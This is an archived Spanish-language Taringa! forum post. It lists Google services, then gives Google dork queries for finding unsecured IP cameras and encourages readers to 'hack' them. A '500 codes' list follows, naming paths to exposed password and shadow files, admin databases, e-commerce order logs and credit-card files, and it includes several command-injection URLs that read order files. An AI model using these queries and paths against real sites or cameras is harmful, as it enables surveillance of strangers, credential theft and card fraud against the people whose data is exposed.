'news' (newsgroups). Contiene el archivo de DejaNews, adquirida por Google. http://directory.google.com/ Utiliza la tenología de Google para buscar dentro de las categorías del OpenDirectory - DMOZ- (www.dmoz.org) http://news.google.com/ Buscador de noticias, en más de 4.000 medios de comunicación de Internet. http://froogle.google.com/froogle Es un buscador de información de productos online. Google no es el que vende, simplemente se aprovecha de su motor de búsqueda para reconocer los sitios web que ofrecen productos online y crear una base de datos con sus datos y sus URLs. http://catalogs.google.com/ Buscador de productos, dentro de los catálogos de venta por correo de cientos de empresas. http://labs.google.com/ Servidor de pruebas de Google, donde se pueden hacer búsquedas de significado de palabras, conjuntos de términos, búsqueda por voz, y búsqueda avanzada por el teclado. http://answers.google.com/ Cientos de usuarios realizan sus preguntas, y ofrecen recompensa por las respuestas. http://toolbar.google.com/ Integración de una barra de búsqueda de Google dentro del navegador web. Solamente disponible para MS IExplorer sobre MS Windows. Otros navegadores web incluyen una herramienta similar. Por ejemplo, para Mozilla se ha desarrollado http://googlebar.mozdev.org/ http://www.google.com/unclesam Busca en los servidores cuyos dominios son .gov, .mil ó .us http://www.google.com/linux Busca términos relacionados con el Sistema Operativo Linux. http://www.google.com/bsd Busca términos relacionados con los Sistema Operativo BSD*. http://www.google.com/mac Busca dentro de todo lo relacionado con Apple y Macintosh. http://www.google.com/microsoft Busca términos relacionados con la compañía Microsoft. http://www.google.com/options/universities.html Las Universidades de todo el mundo pueden añadir su propio Google. http://www.google.com/wml Versión WAP de Google. http://translate.google.com/translate_t Traduce páginas webs entre varios idiomas (inglés, español, alemán, francés, ...). http://www.googlestore.com/ Camisetas, bolígrafos, gorras, ... Todo relacionado con Google. Referencias: http://google.dirson.com http://www.vnunet.com/News/1127162 http://johnny.ihackstuff.com/ http://www.oreilly.com/catalog/googlehks/ Uno de los ejemplos de las cosas mas 'grosas' que podemos llegar a conseguir http://domecam.uridium.ch/CgiStart?page=Multi&Language=9&Page=2&Resolution=320x240&Interval=0&Quality=Standard&Mode=Motion Algunos ejemplo de los codigos que debemos utilizara para ver camaras ip [hagan click en las opciones] (de servidores poco seguros) (las opciones tiran resultados distintos) : Opcion 1 código: inurl:/view.shtml Opcion 2 código: inurl:ViewerFrame?Mode= Opcion 3 código: inurl:ViewerFrame?Mode=Refresh Opcion 4 código: inurl:axis-cgi/jpg Opcion 5 código: inurl:axis-cgi/mjpg (motion-JPEG) Opcion 6 código: inurl:view/indexFrame.shtml (motion-JPEG) Opcion 7 código: inurl:view/index.shtml Opcion 8 código: inurl:view/view.shtml Opcion 9 código: intitle:axis intitle:”video server” Opcion 10 código: iintitle:liveapplet inurl:LvAppl Opcion 11 código: intitle:”EvoCam” inurl:”webcam.html” Opcion 12 código: intitle:”Live NetSnap Cam-Server feed” Opcion 13 código: intitle:”Live View / - AXIS” Opcion 14 código: intitle:”Live View / - AXIS 206M” Opcion 15 código: intitle:”Live View / - AXIS 206W” Opcion 16 código: intitle:”Live View / - AXIS 210″ Opcion 17 código: inurl:indexFrame.shtml Axis Opcion 18 código: inurl:”MultiCameraFrame?Mode=Motion” intitle: busca paginas con el titulo... ": que sea exactamente esto live view: este servidor pones esto a todas sus pag. por eso nos sirve para buscar ahi iurl: que en la direccion este... index.shtml: es la extencion que usa ese servidor Si leyeron bien y prestaron atención están capacitados para hacer sus experimentos y hackear cámaras ip a su gusto TOP 500 de codigos actualizados de Google: 1. “Index of /admin” 2. “Index of /password” 3. “Index of /mail” 4. “Index of /” +passwd 5. “Index of /” +password.txt 6. “Index of /” +.htaccess 7. index of ftp +.mdb allinurl:/cgi-bin/ +mailto 8. administrators.pwd.index 9. authors.pwd.index 10. service.pwd.index 11. filetype:config web 12. gobal.asax index 13. allintitle: “index of/admin” 14. allintitle: “index of/root” 15. allintitle: sensitive filetype:doc 16. allintitle: restricted filetype :mail 17. allintitle: restricted filetype:doc site:gov 18. inurlasswd filetype:txt 19. inurl:admin filetype:db 20. inurl:iisadmin 21. inurl:”auth_user_file.txt” 22. inurl:”wwwroot/*.” 23. top secret site:mil 24. confidential site:mil 25. allinurl: winnt/system32/ (get cmd.exe) 26. allinurl:/bash_history 27. intitle:”Index of” .sh_history 28. intitle:”Index of” .bash_history 29. intitle:”index of” passwd 30. intitle:”index of” people.lst 31. intitle:”index of” pwd.db 32. intitle:”index of” etc/shadow 33. intitle:”index of” spwd 34. intitle:”index of” master.passwd 35. intitle:”index of” htpasswd 36. intitle:”index of” members OR accounts 37. intitle:”index of” user_carts OR user_cart 38. ALTERNATIVE INPUTS==================== 39. _vti_inf.html 40. service.pwd 41. users.pwd 42. authors.pwd 43. administrators.pwd 44. shtml.dll 45. shtml.exe 46. fpcount.exe 47. default.asp 48. showcode.asp 49. sendmail.cfm 50. getFile.cfm 51. imagemap.exe 52. test.bat 53. msadcs.dll 54. htimage.exe 55. counter.exe 56. browser.inc 57. hello.bat 58. default.aspdvwssr.dll 59. cart32.exe 60. add.exe 61. index.jsp 62. SessionServlet 63. shtml.dll 64. index.cfm 65. page.cfm 66. shtml.exe 67. web_store.cgi 68. shop.cgi 69. upload.asp 70. default.asp 71. pbserver.dll 72. phf 73. test-cgi 74. finger 75. Count.cgi 76. jj 77. php.cgi 78. php 79. nph-test-cgi 80. handler 81. webdist.cgi 82. webgais 83. websendmail 84. faxsurvey 85. htmlscript 86. perl.exe 87. wwwboard.pl 88. www-sql 89. view-source 90. campas 91. aglimpse 92. glimpse 93. man.sh 94. AT-admin.cgi 95. AT-generate.cgi 96. filemail.pl 97. maillist.pl 98. info2www 99. files.pl 100. bnbform.cgi 101. survey.cgi 102. classifieds.cgi 103. wrap 104. cgiwrap 105. edit.pl 106. perl 107. names.nsf 108. webgais 109. dumpenv.pl 110. test.cgi 111. submit.cgi 112. guestbook.cgi 113. guestbook.pl 114. cachemgr.cgi 115. responder.cgi 116. perlshop.cgi 117. query 118. w3-msql 119. plusmail 120. htsearch 121. infosrch.cgi 122. publisher 123. ultraboard.cgi 124. db.cgi 125. formmail.cgi 126. allmanage.pl 127. ssi 128. adpassword.txt 129. redirect.cgi 130. cvsweb.cgi 131. login.jsp 132. dbconnect.inc 133. admin 134. htgrep 135. wais.pl 136. amadmin.pl 137. subscribe.pl 138. news.cgi 139. auctionweaver.pl 140. .htpasswd 141. acid_main.php 142. access.log 143. log.htm 144. log.html 145. log.txt 146. logfile 147. logfile.htm 148. logfile.html 149. logfile.txt 150. logger.html 151. stat.htm 152. stats.htm 153. stats.html 154. stats.txt 155. webaccess.htm 156. wwwstats.html 157. source.asp 158. perl 159. mailto.cgi 160. YaBB.pl 161. mailform.pl 162. cached_feed.cgi 163. global.cgi 164. Search.pl 165. build.cgi 166. common.php 167. show 168. global.inc 169. ad.cgi 170. WSFTP.LOG 171. index.html~ 172. index.php~ 173. index.html.bak 174. index.php.bak 175. print.cgi 176. register.cgi 177. webdriver 178. bbs_forum.cgi 179. mysql.class 180. sendmail.inc 181. CrazyWWWBoard.cgi 182. search.pl 183. way-board.cgi 184. webpage.cgi 185. pwd.dat 186. adcycle 187. post-query 188. help.cgi 189. /robots.txt 190. /admin.mdb 191. /shopping.mdb 192. /arg; 193. /stats/styles.css 194. /statshelp.htm 195. /favicon.ico 196. /stats/admin.mdb 197. /shopdbtest.asp 198. /cgi-bin/test.cgi 199. /cgi-bin/test.pl 200. /cgi-bin/env.cgi 201. /photos/protest/styles.css 202. http://hpcgi1.nifty.com/trino/ProxyJ/prxjdg.cgi 203. /cgi-bin/whereami.cgi 204. /shopping400.mdb 205. /cgi/test.cgi 206. /cgi-bin/test2.pl 207. /photos/protest/kingmarch_02.html 208. /chevy/index.htm 209. /cgi-bin/glocation.cgi 210. /cgi-bin/test2.cgi 211. /ccbill/glocation.cgi 212. /cgi-bin/styles.css 213. /shopping350.mdb 214. /cgi-bin/shopper.cgi 215. /shopadmin.asp 216. /news_2003-02-27.htm 217. /cgi-bin/whois.cgi 218. 3 /cgi-bin/calendar.pl 219. 3 /cgi-bin/calendar/calendar.pl 220. 3 /cgibin/styles.css 221. 3 /venem.htm 222. 2 /stats/www.newbauersflowers.com/stats/04-refers.htm 223. 2 /cgi-bin/where.pl 224. 2 /cgibin/shopper.cgi&TEMPLATE=ORDER.LOG 225. 2 /cgibin/recon.cgi 226. 2 /cgibin/test.cgi 227. 2 /WebShop/templates/styles.css 228. 2 /stats/shopping350.mdb 229. 2 /cgi-bin/mailform.cgi 230. 2 /cgi-bin/recon.cgi 231. 2 /chevy 232. 2 /cgi-bin/servinfo.cgi 233. 2 /acart2_0.mdb 234. 2 /cgi-bin/where.cgi 235. 2 /chevy/ 236. 2 /stats/www.savethemall.net/stats/19-refers.htm 237. 2 /ccbill/secure/ccbill.log 238. 2 /cgi/recon.cgi 239. 2 /stats/www.gregoryflynn.com/chevy 240. 2 /ibill/glocation.cgi 241. 2 /ccbill/whereami.cgi 242. 2 /ibill/whereami.cgi 243. 2 /apps_trial.htm 244. 2 /cgi-bin/lancelot/recon.cgi 245. 2 /cgi-bin/DCShop/Orders/styles.css 246. 1 /cgi-bin/htmanage.cgi 247. 1 /stats/www.tysons.net/stats/05-refers.htm 248. 1 /cgi-bin/mastergate/add.cgi 249. 1 /cgi-bin/openjournal.cgi 250. 1 /cgi-bin/calendar/calendar_admin.pl 251. 1 /cgibin/ibill/count.cgi 252. 1 /cgi-bin/nbmember2.cgi 253. 1 /cgi-bin/mastergate/count.cgi 254. 1 /cgi-bin/mastergate/accountcreate.cgi 255. 1 /cgi-bin/ibill/accountcreate.cgi 256. 1 /cgibin/MasterGate2/count.cgi 257. 1 /cgi-bin/amadmin.pl 258. 1 /cgibin/mailform.cgi 259. 1 /cgibin/mastergate/count.cgi 260. 1 /cgibin/harvestor.cgi 261. 1 /cgibin/igate/count.cgi 262. 1 /WebShop 263. 1 /shopdisplaycategories.asp 264. 1 /cgi-bin/DCShop/Orders/orders.txt 265. 1 /cgi-bill/revshare/joinpage.cgi 266. 1 /stats/www.gregoryflynn.com/stats/19-refers.htm 267. 1 /cgi-local/DCShop/auth_data/styles.css 268. 1 /cgi-bin/add-passwd.cgi 269. 1 /cgi-bin/MasterGate/count.cgi 270. 1 /apps_shop.htm%20/comersus/database/comersus.mdb 271. 1 /data/verotellog.txt 272. 1 /epwd/ws_ftp.log 273. 1 /stats/www.dialacure.com/stats/16-refers.htm 274. 1 /cgi/MasterGate2/count.cgi 275. 1 /jump/rsn.tmus/skybox;sz=140×150;segment=all;resor=jackson;state= WY;sect=home;tile=8;ord=57019 276. 1 /wwii/styles.css 277. 1 /cgi-bin/admin.mdb 278. 1 /stats/www.gregoryflynn.com/stats/31-refers.htm 279. 1 /cgi-bin/ibill-tools/count.cgi 280. 1 /WebShop/templates/cc.txt 281. 1 /cgibin/ibill/accountcreate.cgi 282. 1 /cgi-bin/count.cgi 283. 1 /cgi-local/DCShop/auth_data/auth_user_file.txt 284. 1 /cgi/mastergate/count.cgi 285. 1 /cgi-bin/EuroDebit/addusr.pl 286. 1 /cgi-bin/dbm-passwd.cgi 287. 1 /cgi/igate/accountcreate.cgi 288. 1 /cgi-bin/store/Log_files/your_order.log 289. store/log_files/your_order.log 290. /cgi-bin/DCShop/Orders/orders.txt 291. /vpasp/shopdbtest.asp 292. /orders/checks.txt 293. /WebShop/logs 294. /ccbill/secure/ccbill.log 295. /scripts/cart32.exe 296. /cvv2.txt 297. /cart/shopdbtest.asp 298. /cgi-win/cart.pl 299. /shopdbtest.asp 300. /WebShop/logs/cc.txt 301. /cgi-local/cart.pl 302. /PDG_Cart/order.log 303. /config/datasources/expire.mdb 304. /cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml 305. /orders/orders.txt 306. /cgis/cart.pl 307. /webcart/carts 308. /cgi-bin/cart32.exe/cart32clientlist 309. /cgi/cart.pl 310. /comersus/database/comersus.mdb 311. /WebShop/templates/cc.txt 312. /Admin_files/order.log 313. /orders/mountain.cfg 314. /cgi-sys/cart.pl 315. /scripts/cart.pl 316. /htbin/cart.pl 317. /productcart/database/EIPC.mdb 318. /shoponline/fpdb/shop.mdb 319. /config/datasources/myorder.mdb 320. /PDG_Cart/shopper.conf 321. /shopping/database/metacart.mdb 322. /bin/cart.pl 323. /cgi-bin/cart32.ini 324. /database/comersus.mdb 325. /cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt 326. /cgi-bin/store/Admin_files/myorderlog.txt 327. /cgi-bin/orders.txt 328. /cgi-bin/store/Admin_files/your_order.log 329. /test/test.txt 330. /fpdb/shop.mdb 331. /cgibin/shop/orders/orders.txt 332. /shopadmin1.asp 333. /cgi-bin/shop.cgi 334. /cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi 335. /cgi-bin/PDG_cart/card.txt 336. /shopper.cgi?preadd=action&key=PROFA&template=order1.log 337. /store/shopdbtest.asp 338. /log_files/your_order.log 339. /_database/expire.mdb 340. /HyperStat/stat_what.log 341. /cgibin/DCShop/auth_data/auth_user_file.txt 342. /htbin/orders/orders.txt 343. /SHOP/shopadmin.asp 344. /index.cgi?page=../admin/files/order.log 345. /vpshop/shopadmin.asp 346. /webcart/config 347. /PDG/order.txt 348. /cgi-bin/shopper.cgi 349. /orders/order.log 350. /orders/db/zzzbizorders.log.html 351. /easylog/easylog.html 352. /cgi-bin/store/Log_files/your_order.log 353. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping400.mdb 354. /comersus_message.asp? 355. /orders/import.txt 356. /htbin/DCShop/auth_data/auth_user_file.txt 357. /admin/html_lib.pl 358. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.txt 359. /cgi-bin/DCShop/auth_data/auth_user_file.txt 360. /cgi-bin/shop.pl/page=;cat%20shop.pl 361. /cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log 362. /HBill/htpasswd 363. /bin/shop/auth_data/auth_user_file.txt 364. /cgi-bin/cs/shopdbtest.asp 365. /mysql/shopping.mdb 366. /Catalog/config/datasources/Products.mdb 367. /trafficlog 368. /cgi/orders/orders.txt 369. /cgi-local/PDG_Cart/shopper.conf 370. /store/cgi-bin/Admin_files/expire.mdb 371. /derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log 372. /derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log 373. /cgi-bin/mc.txt 374. /cgi-bin/mall2000.cgi 375. /cgi-win/DCShop/auth_data/auth_user_file.txt 376. /cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log 377. /store/commerce.cgi 378. /scripts/shop/orders/orders.txt 379. /product/shopping350.mdb 380. /super_stats/access_logs 381. /cgi-local/orders/orders.txt 382. /cgi-bin/PDG_Cart/mc.txt 383. /cgibin/cart32.exe 384. /cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other/risinglogorder.log 385. /cgibin/password.txt 386. /Catalog/cart/carttrial.dat 387. /catalog/Admin/Admin.asp 388. /ecommerce/admin/user/admin.asp 389. /data/productcart/database/EIPC.mdb 390. /store/admin_files/commerce_user_lib.pl 391. /cgi-bin/store/index.cgi 392. /paynet.txt 393. /config/datasources/store/billing.mdb 394. /_database/shopping350.mdb 395. /cgi-bin/shopper.exe?search 396. /cgi/shop.pl/page=;cat%20shop.pl 397. /cgi-bin/store/Admin_files/orders.txt 398. /cgi-bin/store/commerce_user_lib.pl 399. /cgi-sys/pagelog.cgi 400. /cgi-sys/shop.pl/page=;cat%20shop.pl 401. /scripts/weblog 402. /fpdb/shopping400.mdb 403. /htbin/shop/orders/orders.txt 404. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.log 405. /cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log 406. /mall_log_files/ 407. /cgi-bin/perlshop.cgi 408. /tienda/shopdbtest.asp 409. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.mdb 410. /cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log 411. /WebShop/logs/ck.log 412. /fpdb/shopping300.mdb 413. /mysql/store.mdb 414. /cgi-bin/store/Admin_files/commerce_user_lib.pl 415. /config.dat 416. /order/order.log 417. /commerce_user_lib.pl 418. /Admin_files/AuthorizeNet_user_lib.pl 419. /cvv2.asp 420. /cgi-bin/cart32/CART32-order.txt 421. /wwwlog 422. /cool-logs/mlog.html 423. /cgi-bin/pass/merchant.cgi.log 424. /cgi-local/pagelog.cgi 425. /cgi-bin/pagelog.cgi 426. /cgi-bin/orders/cc.txt 427. /cgis/shop/orders/orders.txt 428. /admin/admin_conf.pl 429. /cgi-bin/pdg_cart/order.log 430. /cgi/PDG_Cart/order.log 431. /Admin_files/ccelog.txt 432. /cgi-bin/orders/mc.txt 433. /cgi/cart32.exe 434. /ecommerce/admin/admin.asp 435. /scripts/DCShop/auth_data/auth_user_file.txt 436. /Catalog/config/datasources/Expire.mdb 437. /ecommerce/admin/shopdbtest.asp 438. /mysql/mystore.mdb 439. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.asp 440. /cgi-bin/commercesql/index.cgi?page=../admin/files/order.log 441. /cgi-bin/Count.cgi?df=callcard.dat 442. /logfiles/ 443. /shopping/shopping350.mdb 444. /admin/configuration.pl 445. /cgis/DCShop/auth_data/auth_user_file.txt 446. /cgis/cart32.exe 447. /cgi-bin/dcshop.cgi 448. /cgi-win/shop/auth_data/auth_user_file.txt 449. /shopping400.mdb 450. /HBill/config 451. /cgi-bin/shop/index.cgi?page=../admin/files/order.log 452. /search=action&keywords=GSD%20&template=order.log 453. /WebCart/orders.txt 454. /PDG_Cart/authorizenets.txt 455. /cgi-bin/AnyForm2 456. /~gcw/cgi-bin/Count.cgi?df=callcard.dat 457. /cgi-bin/PDG_Cart/order.log 458. /expire.mdb 459. /logger/ 460. /webcart-lite/orders/import.txt 461. /cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl 462. /cgi-bin/PDG_Cart/shopper.conf 463. /cgi-bin/cart32.exe 464. /dc/orders/orders.txt 465. /cgi-local/DCShop/orders/orders.txt 466. /shop.pl/page=shop.cfg 467. /cgi-local/cart32.exe 468. /cgi-win/pagelog.cgi 469. /cgi-win/shop/orders/orders.txt 470. /cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv 471. /cgi-sys/DCShop/auth_data/auth_user_file.txt 472. /cgi-bin/www-sql;;; 473. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order.log 474. /scripts/orders/orders.txt 475. /cgi-local/shop.pl/shop.cfg 476. /search=action&keywords=cwtb%20&template=expire.mdb 477. /php/mylog.phtml 478. /config/datasources/shopping.mdb 479. /php-coolfile/action.php?action=edit&file=config.php 480. /cgi-bin/ezmall2000/mall2000.cgi 481. /cgi/DCShop/orders/orders.txt 482. /cgi-local/shop.pl 483. /cgis/DCShop/orders/orders.txt 484. /product/shopdbtest.asp 485. /ASP/cart/database/metacart.mdb 486. /cgi-bin/cgi-lib.pl 487. /cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html 488. /search=action&keywords=cwtb%20&template=order.log 489. /mysql/expire.mdb 490. /scripts/shop/auth_data/auth_user_file.txt 491. /cgi-bin/cart32/whatever-OUTPUT.txt 492. /Shopping%20Cart/shopdbtest.asp 493. /cgi/shop/auth_data/auth_user_file.txt 494. /shop/shopping350.mdb 495. /cgi-bin/store/Authorize_Net.pl 496. /scripts/DCShop/orders/orders.txt 497. /store/log_files/commerce_user_lib.pl 498. /shopping/shopadmin.asp 499. /cgi-bin/orderlog.txt 500. /cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;; 501. /cool-logs/mylog.html 502. /cgibin/shop.pl/page=;cat%20shop.pl 503. /htbin/shop.pl/page=;cat%20shop.pl 504. /cgi-win/orders/orders.txt 505. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.txt 506. /SHOP/shopdbtest.asp 507. /cgi/pagelog.cgi 508. /php/mlog.phtml 509. /cgi-bin/shop/apdproducts.mdb 510. /htbin/shop/auth_data/auth_user_file.txt 511. /server%20logfile;;; 512. /database/metacart.mdb 513. /cgi-local/shop/orders/orders.txt Bueno, esto fue todo por ahora, los invito a pasarse por mis otros post. ...Los '90...qué época loco... http://www.taringa.net/posts/imagenes/14199295/___los-_90-mi-infancia___que-epoca-loco___.html#comid-847479 Como hacer tu propia fuente electricia ininterrumpida (UPS) http://www.taringa.net/posts/hazlo-tu-mismo/14145132/Como-hacer-tu-propia-fuente-electricia-ininterrumpida-_UPS_.html

20
1
I
Imagenes de la nuca
ArteporAnónimo8/13/2013

Hay una historia en el orden de las imagenes, espero que la entiendan, disfruten y tomen conciencia. (Dedicado a Lea que donde sea que estes espero veas este post) Gracias.

20
6
PosteameloArchivo Histórico de Taringa! (2004-2017). Preservando la inteligencia colectiva de la internet hispanohablante.

CONTACTO

18 de Septiembre 455, Casilla 52

Chillán, Región de Ñuble, Chile

Solo correo postal

© 2026 Posteamelo.com. No afiliado con Taringa! ni sus sucesores.

Contenido preservado con fines históricos y culturales.